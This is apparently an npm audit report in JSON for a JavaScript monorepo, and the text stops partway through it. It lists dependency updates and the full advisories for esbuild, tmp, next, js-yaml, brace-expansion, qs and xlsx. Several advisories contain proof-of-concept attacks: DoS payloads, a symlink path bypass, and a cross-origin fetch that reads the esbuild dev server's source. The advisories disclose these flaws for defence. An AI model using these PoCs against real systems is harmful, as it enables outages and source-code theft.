audit.json
859 lines (859 loc) · 117 KB
{
"actions": [
{
"action": "update",
"resolves": [
{
"id": 1112954,
"path": ".>minimatch>@isaacs/brace-expansion",
"dev": false,
"optional": false,
"bundled": false
}
],
"module": "@isaacs/brace-expansion",
"target": "5.0.1",
"depth": 3
},
{
"action": "update",
"resolves": [
{
"id": 1113161,
"path": "sites__mainweb>stripe>qs",
"dev": false,
"optional": false,
"bundled": false
}
],
"module": "qs",
"target": "6.15.0",
"depth": 3
},
{
"action": "update",
"resolves": [
{
"id": 1113428,
"path": "packages__ui>eslint>ajv",
"dev": false,
"optional": false,
"bundled": false
}
],
"module": "ajv",
"target": "6.14.0",
"depth": 3
},
{
"action": "update",
"resolves": [
{
"id": 1113515,
"path": "packages__api>vitest>vite>rollup",
"dev": false,
"optional": false,
"bundled": false
}
],
"module": "rollup",
"target": "4.59.0",
"depth": 4
},
{
"action": "update",
"resolves": [
{
"id": 1113518,
"path": ".>@turbo/gen>proxy-agent>pac-proxy-agent>get-uri>basic-ftp",
"dev": false,
"optional": false,
"bundled": false
}
],
"module": "basic-ftp",
"target": "5.2.0",
"depth": 6
},
{
"action": "review",
"module": "esbuild",
"resolves": [
{
"id": 1102341,
"path": "packages__db>drizzle-kit>@esbuild-kit/esm-loader>@esbuild-kit/core-utils>esbuild",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1102341,
"path": "packages__db>drizzle-kit>esbuild",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "xlsx",
"resolves": [
{
"id": 1108110,
"path": "packages__db>xlsx",
"dev": false,
"bundled": false,
"optional": false
},
{
"id": 1108111,
"path": "packages__db>xlsx",
"dev": false,
"bundled": false,
"optional": false
}
]
},
{
"action": "review",
"module": "tmp",
"resolves": [
{
"id": 1109537,
"path": ".>@turbo/gen>inquirer>external-editor>tmp",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "next",
"resolves": [
{
"id": 1112592,
"path": ".>next",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1112645,
"path": ".>next",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1112990,
"path": ".>next",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "js-yaml",
"resolves": [
{
"id": 1112715,
"path": ".>@turbo/gen>@turbo/workspaces>js-yaml",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "minimatch",
"resolves": [
{
"id": 1113459,
"path": ".>@turbo/gen>node-plop>del>rimraf>glob>minimatch",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1113465,
"path": ".>@turbo/gen>minimatch",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1113465,
"path": "sites__mainweb>typescript-eslint>@typescript-eslint/typescript-estree>minimatch",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1113466,
"path": ".>minimatch",
"dev": false,
"optional": false,
"bundled": false
}
]
}
],
"advisories": {
"1102341": {
"findings": [
{
"version": "0.18.20",
"paths": [
"packages__db>drizzle-kit>@esbuild-kit/esm-loader>@esbuild-kit/core-utils>esbuild"
]
},
{
"version": "0.19.12",
"paths": [
"packages__db>drizzle-kit>esbuild"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99\n- https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d\n- https://github.com/advisories/GHSA-67mh-4wv8-2f99",
"created": "2025-02-10T17:48:07.000Z",
"id": 1102341,
"npm_advisory_id": null,
"overview": "### Summary\n\nesbuild allows any websites to send any request to the development server and read the response due to default CORS settings.\n\n### Details\n\nesbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.\n\nhttps://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121\nhttps://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363\n\n**Attack scenario**:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n1. The user accesses the malicious web page.\n1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.\n\nIn this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by\n\n- Fetching `/index.html`: normally you have a script tag here\n- Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files\n- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`)\n- Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file\n\nThe scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.\n\n### PoC\n\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18561484/reproduction.zip)\n2. Extract it and move to that directory\n1. Run `npm i`\n1. Run `npm run watch`\n1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.\n\n\n\n### Impact\n\nUsers using the serve feature may get the source code stolen by malicious websites.",
"reported_by": null,
"title": "esbuild enables any website to send any requests to the development server and read the response",
"metadata": null,
"cves": [],
"access": "public",
"severity": "moderate",
"module_name": "esbuild",
"vulnerable_versions": "<=0.24.2",
"github_advisory_id": "GHSA-67mh-4wv8-2f99",
"recommendation": "Upgrade to version 0.25.0 or later",
"patched_versions": ">=0.25.0",
"updated": "2025-02-10T17:48:08.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
},
"cwe": [
"CWE-346"
],
"url": "https://github.com/advisories/GHSA-67mh-4wv8-2f99"
},
"1108110": {
"findings": [
{
"version": "0.18.5",
"paths": [
"packages__db>xlsx"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://nvd.nist.gov/vuln/detail/CVE-2023-30533\n- https://cdn.sheetjs.com/advisories/CVE-2023-30533\n- https://git.sheetjs.com/sheetjs/sheetjs/src/branch/master/CHANGELOG.md\n- https://git.sheetjs.com/sheetjs/sheetjs/issues/2667\n- https://git.sheetjs.com/sheetjs/sheetjs/issues/2986\n- https://cdn.sheetjs.com\n- https://github.com/advisories/GHSA-4r6h-8v6p-xvw6",
"created": "2023-04-24T09:30:19.000Z",
"id": 1108110,
"npm_advisory_id": null,
"overview": "All versions of SheetJS CE through 0.19.2 are vulnerable to \"Prototype Pollution\" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.\n\nA non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package `xlsx` are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.",
"reported_by": null,
"title": "Prototype Pollution in sheetJS",
"metadata": null,
"cves": [
"CVE-2023-30533"
],
"access": "public",
"severity": "high",
"module_name": "xlsx",
"vulnerable_versions": "<0.19.3",
"github_advisory_id": "GHSA-4r6h-8v6p-xvw6",
"recommendation": "None",
"patched_versions": "<0.0.0",
"updated": "2025-09-19T15:23:41.000Z",
"cvss": {
"score": 7.8,
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
},
"cwe": [
"CWE-1321"
],
"url": "https://github.com/advisories/GHSA-4r6h-8v6p-xvw6"
},
"1108111": {
"findings": [
{
"version": "0.18.5",
"paths": [
"packages__db>xlsx"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://nvd.nist.gov/vuln/detail/CVE-2024-22363\n- https://cdn.sheetjs.com/advisories/CVE-2024-22363\n- https://cwe.mitre.org/data/definitions/1333.html\n- https://git.sheetjs.com/sheetjs/sheetjs/src/tag/v0.20.2\n- https://cdn.sheetjs.com\n- https://github.com/advisories/GHSA-5pgg-2g8v-p4x9",
"created": "2024-04-05T06:30:46.000Z",
"id": 1108111,
"npm_advisory_id": null,
"overview": "SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).\n\nA non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package `xlsx` are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.",
"reported_by": null,
"title": "SheetJS Regular Expression Denial of Service (ReDoS)",
"metadata": null,
"cves": [
"CVE-2024-22363"
],
"access": "public",
"severity": "high",
"module_name": "xlsx",
"vulnerable_versions": "<0.20.2",
"github_advisory_id": "GHSA-5pgg-2g8v-p4x9",
"recommendation": "None",
"patched_versions": "<0.0.0",
"updated": "2025-09-19T15:23:26.000Z",
"cvss": {
"score": 7.5,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
},
"cwe": [
"CWE-1333"
],
"url": "https://github.com/advisories/GHSA-5pgg-2g8v-p4x9"
},
"1109537": {
"findings": [
{
"version": "0.0.33",
"paths": [
".>@turbo/gen>inquirer>external-editor>tmp"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\n- https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\n- https://nvd.nist.gov/vuln/detail/CVE-2025-54798\n- https://github.com/raszi/node-tmp/issues/207\n- https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html\n- https://github.com/advisories/GHSA-52f5-9888-hmc6",
"created": "2025-08-06T17:06:04.000Z",
"id": 1109537,
"npm_advisory_id": null,
"overview": "### Summary\n\n`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.\n\n\n### Details\n\nAccording to the documentation there are some conditions that must be held:\n\n```\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50\n\nOther breaking changes, i.e.\n\n- template must be relative to tmpdir\n- name must be relative to tmpdir\n- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks\n\nare still in place.\n\nIn order to override the system's tmpdir, you will have to use the newly\nintroduced tmpdir option.\n\n\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375\n* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.\n absolute paths are fine as long as they point to a location under the system's default temporary directory.\n Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, \n as tmp will not check the availability of the path, nor will it establish the requested path for you.\n```\n\nRelated issue: https://github.com/raszi/node-tmp/issues/207.\n\n\nThe issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579\nfunction _resolvePath(name, tmpDir) {\n if (name.startsWith(tmpDir)) {\n return path.resolve(name);\n } else {\n return path.resolve(path.join(tmpDir, name));\n }\n}\n```\n\nIf the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609\nfunction _assertIsRelative(name, option, tmpDir) {\n if (option === 'name') {\n // assert that name is not absolute and does not contain a path\n if (path.isAbsolute(name))\n throw new Error(`${option} option must not contain an absolute path, found \"${name}\".`);\n // must not fail on valid .<name> or ..<name> or similar such constructs\n let basename = path.basename(name);\n if (basename === '..' || basename === '.' || basename !== name)\n throw new Error(`${option} option must not contain a path, found \"${name}\".`);\n }\n else { // if (option === 'dir' || option === 'template') {\n // assert that dir or template are relative to tmpDir\n if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${name}\".`);\n }\n let resolvedPath = _resolvePath(name, tmpDir); //<--- \n if (!resolvedPath.startsWith(tmpDir))\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${resolvedPath}\".`);\n }\n}\n```\n\n\n### PoC\n\nThe following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.\nTested on a Linux machine.\n\n- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it\n```bash\nmkdir $HOME/mydir1\n\nln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir\n```\n\n- check the folder is empty:\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n```\n\n- run the poc\n```bash\nnode main.js\nFile: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf\ntest 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'\ntest 2: dir option must be relative to \"/tmp\", found \"/foo\".\ntest 3: dir option must be relative to \"/tmp\", found \"/home/user/mydir1\".\n```\n\n- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]\n```\n\n\n- `main.js`\n```js\n// npm i tmp@0.2.3\n\nconst tmp = require('tmp');\n\nconst tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});\nconsole.log('File: ', tmpobj.name);\n\ntry {\n tmp.fileSync({ 'dir': 'mydir1'});\n} catch (err) {\n console.log('test 1:', err.message)\n}\n\ntry {\n tmp.fileSync({ 'dir': '/foo'});\n} catch (err) {\n console.log('test 2:', err.message)\n}\n\ntry {\n const fs = require('node:fs');\n const resolved = fs.realpathSync('/tmp/evil-dir');\n tmp.fileSync({ 'dir': resolved});\n} catch (err) {\n console.log('test 3:', err.message)\n}\n```\n\n\nA Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.\n```js\nfunction _resolvePath(name, tmpDir) {\n let resolvedPath;\n if (name.startsWith(tmpDir)) {\n resolvedPath = path.resolve(name);\n } else {\n resolvedPath = path.resolve(path.join(tmpDir, name));\n }\n return fs.realpathSync(resolvedPath);\n}\n```\n\n\n### Impact\n\nArbitrary temporary file / directory write via symlink",
"reported_by": null,
"title": "tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter",
"metadata": null,
"cves": [
"CVE-2025-54798"
],
"access": "public",
"severity": "low",
"module_name": "tmp",
"vulnerable_versions": "<=0.2.3",
"github_advisory_id": "GHSA-52f5-9888-hmc6",
"recommendation": "Upgrade to version 0.2.4 or later",
"patched_versions": ">=0.2.4",
"updated": "2025-11-03T21:34:21.000Z",
"cvss": {
"score": 2.5,
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
},
"cwe": [
"CWE-59"
],
"url": "https://github.com/advisories/GHSA-52f5-9888-hmc6"
},
"1112592": {
"findings": [
{
"version": "16.1.4",
"paths": [
".>next"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f\n- https://nvd.nist.gov/vuln/detail/CVE-2025-59471\n- https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c\n- https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec\n- https://github.com/vercel/next.js/releases/tag/v15.5.10\n- https://github.com/vercel/next.js/releases/tag/v16.1.5\n- https://github.com/advisories/GHSA-9g9p-9gw9-jx7f",
"created": "2026-01-27T19:18:25.000Z",
"id": 1112592,
"npm_advisory_id": null,
"overview": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"reported_by": null,
"title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
"metadata": null,
"cves": [
"CVE-2025-59471"
],
"access": "public",
"severity": "moderate",
"module_name": "next",
"vulnerable_versions": ">=15.6.0-canary.0 <16.1.5",
"github_advisory_id": "GHSA-9g9p-9gw9-jx7f",
"recommendation": "Upgrade to version 16.1.5 or later",
"patched_versions": ">=16.1.5",
"updated": "2026-01-27T19:18:28.000Z",
"cvss": {
"score": 5.9,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
},
"cwe": [
"CWE-400",
"CWE-770"
],
"url": "https://github.com/advisories/GHSA-9g9p-9gw9-jx7f"
},
"1112645": {
"findings": [
{
"version": "16.1.4",
"paths": [
".>next"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg\n- https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf\n- https://nvd.nist.gov/vuln/detail/CVE-2026-23864\n- https://vercel.com/changelog/summary-of-cve-2026-23864\n- https://github.com/advisories/GHSA-h25m-26qc-wcjf",
"created": "2026-01-28T15:38:01.000Z",
"id": 1112645,
"npm_advisory_id": null,
"overview": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
"reported_by": null,
"title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
"metadata": null,
"cves": [],
"access": "public",
"severity": "high",
"module_name": "next",
"vulnerable_versions": ">=16.1.0-canary.0 <16.1.5",
"github_advisory_id": "GHSA-h25m-26qc-wcjf",
"recommendation": "Upgrade to version 16.1.5 or later",
"patched_versions": ">=16.1.5",
"updated": "2026-01-28T15:38:02.000Z",
"cvss": {
"score": 7.5,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
},
"cwe": [
"CWE-400",
"CWE-502"
],
"url": "https://github.com/advisories/GHSA-h25m-26qc-wcjf"
},
"1112715": {
"findings": [
{
"version": "4.1.0",
"paths": [
".>@turbo/gen>@turbo/workspaces>js-yaml"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m\n- https://nvd.nist.gov/vuln/detail/CVE-2025-64718\n- https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\n- https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\n- https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876\n- https://github.com/advisories/GHSA-mh29-5h37-fv8m",
"created": "2025-11-14T14:29:48.000Z",
"id": 1112715,
"npm_advisory_id": null,
"overview": "### Impact\n\nIn js-yaml 4.1.0, 4.0.0, and 3.14.1 and below, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted.\n\n### Patches\n\nProblem is patched in js-yaml 4.1.1 and 3.14.2.\n\n### Workarounds\n\nYou can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).\n\n### References\n\nhttps://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html",
"reported_by": null,
"title": "js-yaml has prototype pollution in merge (<<)",
"metadata": null,
"cves": [
"CVE-2025-64718"
],
"access": "public",
"severity": "moderate",
"module_name": "js-yaml",
"vulnerable_versions": ">=4.0.0 <4.1.1",
"github_advisory_id": "GHSA-mh29-5h37-fv8m",
"recommendation": "Upgrade to version 4.1.1 or later",
"patched_versions": ">=4.1.1",
"updated": "2026-01-31T03:32:45.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
},
"cwe": [
"CWE-1321"
],
"url": "https://github.com/advisories/GHSA-mh29-5h37-fv8m"
},
"1112954": {
"findings": [
{
"version": "5.0.0",
"paths": [
".>minimatch>@isaacs/brace-expansion"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25547\n- https://github.com/advisories/GHSA-7h2j-956f-4vf2",
"created": "2026-02-03T19:41:15.000Z",
"id": 1112954,
"npm_advisory_id": null,
"overview": "### Summary\n\n`@isaacs/brace-expansion` is vulnerable to a Denial of Service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process.\n\n### Details\n\nThe vulnerability occurs because `@isaacs/brace-expansion` expands brace expressions without any upper bound or complexity limit. Expansion is performed eagerly and synchronously, meaning the full result set is generated before returning control to the caller.\n\nFor example, the following input:\n\n```\n{0..99}{0..99}{0..99}{0..99}{0..99}\n```\n\nproduces:\n\n```\n100^5 = 10,000,000,000 combinations\n```\n\nThis exponential growth can quickly overwhelm the event loop and heap memory, resulting in process termination.\n\n### Proof of Concept\n\nThe following script reliably triggers the issue.\n\nCreate `poc.js`:\n\n```js\nconst { expand } = require('@isaacs/brace-expansion');\n\nconst pattern = '{0..99}{0..99}{0..99}{0..99}{0..99}';\n\nconsole.log('Starting expansion...');\nexpand(pattern);\n```\n\nRun it:\n\n```bash\nnode poc.js\n```\n\nThe process will freeze and typically crash with an error such as:\n\n```\nFATAL ERROR: JavaScript heap out of memory\n```\n\n### Impact\n\nThis is a denial of service vulnerability. Any application or downstream dependency that uses `@isaacs/brace-expansion` on untrusted input may be vulnerable to a single-request crash.\n\nAn attacker does not require authentication and can use a very small payload to:\n\n* Trigger exponential computation\n* Exhaust memory and CPU resources\n* Block the event loop\n* Crash Node.js services relying on this library",
"reported_by": null,
"title": "@isaacs/brace-expansion has Uncontrolled Resource Consumption",
"metadata": null,
"cves": [
"CVE-2026-25547"
],
"access": "public",
"severity": "high",
"module_name": "@isaacs/brace-expansion",
"vulnerable_versions": "<=5.0.0",
"github_advisory_id": "GHSA-7h2j-956f-4vf2",
"recommendation": "Upgrade to version 5.0.1 or later",
"patched_versions": ">=5.0.1",
"updated": "2026-02-05T00:36:55.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-1333"
],
"url": "https://github.com/advisories/GHSA-7h2j-956f-4vf2"
},
"1112990": {
"findings": [
{
"version": "16.1.4",
"paths": [
".>next"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h\n- https://nvd.nist.gov/vuln/detail/CVE-2025-59472\n- https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472\n- https://github.com/advisories/GHSA-5f7q-jpqc-wp7h",
"created": "2026-01-28T15:20:55.000Z",
"id": 1112990,
"npm_advisory_id": null,
"overview": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"reported_by": null,
"title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
"metadata": null,
"cves": [
"CVE-2025-59472"
],
"access": "public",
"severity": "moderate",
"module_name": "next",
"vulnerable_versions": ">=16.0.0-beta.0 <16.1.5",
"github_advisory_id": "GHSA-5f7q-jpqc-wp7h",
"recommendation": "Upgrade to version 16.1.5 or later",
"patched_versions": ">=16.1.5",
"updated": "2026-02-05T17:17:18.000Z",
"cvss": {
"score": 5.9,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
},
"cwe": [
"CWE-400",
"CWE-409",
"CWE-770"
],
"url": "https://github.com/advisories/GHSA-5f7q-jpqc-wp7h"
},
"1113161": {
"findings": [
{
"version": "6.14.1",
"paths": [
"sites__mainweb>stripe>qs"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883\n- https://nvd.nist.gov/vuln/detail/CVE-2026-2391\n- https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\n- https://github.com/advisories/GHSA-w7fw-mjwx-w883",
"created": "2026-02-12T17:04:39.000Z",
"id": 1113161,
"npm_advisory_id": null,
"overview": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional `throwOnLimitExceeded` check occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n  return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n  throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThe `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays. This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require('qs');\n\nconst payload = 'a=' + ','.repeat(25); // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n  const result = qs.parse(payload, options);\n  console.log(result.a.length); // Outputs: 26 (bypass successful)\n} catch (e) {\n  console.log('Limit enforced:', e.message); // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.\n\n### Suggested Fix\nApply the `arrayLimit` check to the result of the comma split in `parseArrayValue` before it is returned, enforcing it on the resulting array length. Use `currentArrayLength` (already calculated upstream) for consistency with the bracket notation fix.\n\n**Current code** (lib/parse.js: lines ~40-50):\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n  return val.split(',');\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n  throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\n\n**Fixed code:**\n```js\nif (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {\n  const splitArray = val.split(',');\n  if (splitArray.length > options.arrayLimit - currentArrayLength) { // Check against remaining limit\n    if (options.throwOnLimitExceeded) {\n      throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n    } else {\n      // Optionally convert to object or truncate, per README\n      return splitArray.slice(0, options.arrayLimit - currentArrayLength);\n    }\n  }\n  return splitArray;\n}\n\nif (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {\n  throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThis aligns behavior with indexed and bracket notations, reuses `currentArrayLength`, and respects `throwOnLimitExceeded`. Update README to note the consistent enforcement.",
"reported_by": null,
"title": "qs's arrayLimit bypass in comma parsing allows denial of service",
"metadata": null,
"cves": [
"CVE-2026-2391"
],
"access": "public",
"severity": "low",
"module_name": "qs",
"vulnerable_versions": ">=6.7.0 <=6.14.1",
"github_advisory_id": "GHSA-w7fw-mjwx-w883",
"recommendation": "Upgrade to version 6.14.2 or later",
